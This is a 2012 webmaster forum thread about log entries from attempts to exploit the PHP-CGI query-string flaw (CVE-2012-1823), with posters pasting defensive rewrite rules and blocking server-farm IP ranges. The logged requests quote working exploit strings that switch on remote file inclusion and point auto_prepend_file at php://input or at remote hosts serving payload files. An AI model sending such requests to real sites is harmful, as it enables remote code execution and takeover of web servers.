Welcome to WebmasterWorld Guest from 23.23.62.93

Forum Moderators: Ocean10000 & incrediBILL

Message Too Old, No Replies

what is this POST command and why did it get a 200?

   
2:37 pm on May 22, 2012 (gmt 0)



The following showed up in my log. I have no idea what it is doing. Also, this is the only entry in the log for IP 173.73.115.178.

173.73.115.178 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"

The IP hasn't accessed anything on my site so I don't even know what it is posting in response to.
It looks to me as if it is trying to do something destructive, but I am only guessing.

(I am unsure which forum topic this question belongs in.)
8:58 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nsty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)
11:08 pm on May 22, 2012 (gmt 0)



Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?
11:22 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



From the topic header:
why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.
11:29 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



The /?- start suggests that the root index file was involved.
11:55 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month




dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.
12:05 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Had the same request two days ago:

173.73.115.178 - - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

was denied based upon incorrect case or syntax on "Windows"
12:13 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.
1:15 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I never use underscores in URLs.


Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?
1:21 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.
1:36 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Block requests with underscore in path:
RewriteRule _ - [F]


I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.
8:42 am on May 23, 2012 (gmt 0)

5+ Year Member



That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.

[php.net...]

It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.
2:09 am on May 24, 2012 (gmt 0)



I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.
3:44 am on May 24, 2012 (gmt 0)

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



gg,

Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake google UA's" (especially this malformed one?

2) Linode is a server farm:
97.107.128.0 - 97.107.143.255
12:01 pm on May 24, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



OT: More ranges on LINODE server farm.

LINODE-US (NET6-2600-3C00-1) 2600:3C00:: - 2600:3C03:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
LINODE-US (NET-173-230-128-0-1) 173.230.128.0 - 173.230.159.255
LINODE-US (NET-173-255-192-0-1) 173.255.192.0 - 173.255.255.255
LINODE-US (NET-50-116-0-0-1) 50.116.0.0 - 50.116.63.255
LINODE-US (NET-66-228-32-0-1) 66.228.32.0 - 66.228.63.255
LINODE-US (NET-69-164-192-0-1) 69.164.192.0 - 69.164.223.255
LINODE-US (NET-72-14-176-0-1) 72.14.176.0 - 72.14.191.255
LINODE-US (NET-74-207-224-0-1) 74.207.224.0 - 74.207.255.255
LINODE-US (NET-96-126-96-0-1) 96.126.96.0 - 96.126.127.255
LINODE-US (NET-97-107-128-0-1) 97.107.128.0 - 97.107.143.255
9:17 pm on May 24, 2012 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



I have a couple of extras on that list...

50.116.0.0 - 50.116.63.255
66.228.32.0 - 66.228.63.255
69.164.192.0 - 69.164.223.255
72.14.176.0 - 72.14.191.255
74.207.224.0 - 74.207.255.255
96.126.96.0 - 96.126.127.255
97.107.128.0 - 97.107.143.255
109.74.192.0 - 109.74.207.255 (UK)
173.230.128.0 - 173.230.159.255
173.255.192.0 - 173.255.255.255
178.79.128.0 - 178.79.191.255
11:34 am on May 25, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - 108.49.215.253 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

108.49.215.253(Verizon Online LLC) trying to inject info3.txt from 81.17.24.82(privatelayer.com.pa - server farm)
8:18 pm on May 25, 2012 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



81.17.24.82 - not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete 81.17.16.0/20 blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range (108.0.0.0-108.57.255.255) that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.
6:19 am on Jun 29, 2012 (gmt 0)



Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"
11:49 pm on Jun 29, 2012 (gmt 0)



It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).

[stopmalvertising.com...]

When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.


[eindbazen.net...]

If you are vulnerable the following directive might help:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try a RFI (Remote File Inclusion) which is a shell most of the time.
11:54 pm on Jun 29, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]
1:44 pm on Jun 30, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - 83.155.50.106 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that IP its pointing to is UP by one from my prev post on this. This is from a different site than the prev one.